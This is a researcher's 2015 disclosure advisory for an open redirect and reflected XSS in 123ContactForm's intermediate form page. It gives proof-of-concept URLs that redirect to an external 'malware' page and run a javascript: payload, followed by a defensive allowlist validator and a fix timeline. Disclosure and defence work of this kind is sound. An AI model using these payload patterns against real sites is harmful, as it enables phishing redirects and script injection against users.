Open Redirect and Reflected XSS on 123ContactForm

WS201516 – Open Redirect and Reflected XSS on 123ContactForm
by David Sopas @dsopas
www.websegura.net

Description:

123ContactForm is a service developed by a young enthusiastic team located in Timisoara, Romania, EU. Founded in 2008, 123ContactForm has become a worldwide top class online form and survey builder.

When visiting a client of 123contactform.com I noticed a strange request from their site.
What I found was an Open Redirect and XSS vulnerability that could be used by malicious users to forward victims to malicious sites, spread malware, phish accounts and even hijack victims' browsers.

Proof-of-concept:

Open Redirect
http://www.123contactform.com/jsform_intermediate.html?url=http://www.websegura.net/malware.htm&xdm_e=http%3A%2F%2Fwww.cliente_123contactform.net&xdm_c=default6100&xdm_p=1

XSS
http://www.123contactform.com/jsform_intermediate.html?url=javascript:prompt(document.domain)&xdm_e=http%3A%2F%2Fwww.cliente_123contactform.net&xdm_c=default6100&xdm_p=1


123ContactForm fixed this issue and put my name on their security acknowledgements list.
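Both findings come from the same root cause: the intermediate page navigates to whatever the `url` parameter contains, so a `javascript:` scheme gives XSS and an external host gives an open redirect. The validator below is an added example, not 123ContactForm's own fix; it assumes a Node.js runtime (WHATWG `URL` class) and a constructed allowlist of customer hosts.

```javascript
// Added example (not 123ContactForm's code): validate a redirect target such as
// the `url` parameter of jsform_intermediate.html before navigating to it.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Constructed allowlist; a real deployment would load its own customer hosts.
const ALLOWED_HOSTS = new Set([
  "www.123contactform.com",
  "forms.example.net",
]);

const FALLBACK_URL = "https://www.123contactform.com/";

function isSafeRedirectTarget(raw, allowedHosts = ALLOWED_HOSTS) {
  let target;
  try {
    // No base URL: relative and protocol-relative values ("//evil.example/") throw.
    target = new URL(raw);
  } catch {
    return false;
  }
  // The parser strips tabs/newlines and lowercases the scheme, so
  // "java\nscript:" and "JAVASCRIPT:" both end up as "javascript:" and are rejected.
  if (!ALLOWED_SCHEMES.has(target.protocol)) return false;
  // Reject "https://trusted.host@evil.example/" style confusion.
  if (target.username || target.password) return false;
  return allowedHosts.has(target.hostname.toLowerCase());
}

// Decide where an intermediate page request may forward to; anything that
// fails validation falls back to a fixed first-party page.
function resolveRedirect(pageUrl, allowedHosts = ALLOWED_HOSTS) {
  const requested = new URL(pageUrl).searchParams.get("url");
  if (requested !== null && isSafeRedirectTarget(requested, allowedHosts)) {
    return requested;
  }
  return FALLBACK_URL;
}

module.exports = { isSafeRedirectTarget, resolveRedirect, FALLBACK_URL };
```

An allowlist of hosts is the robust check here; a blocklist of schemes alone would still leave the open redirect.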

Timeline:

08 May 2015 – Sent the security issue to 123ContactForm
23 May 2015 – Reply from 123ContactForm telling that they are fixing it
26 Jun 2015 – 123ContactForm applied a fix
21 Jul 2015 – My name is added on their security acknowledgements list
22 Jul 2015 – Full disclosure
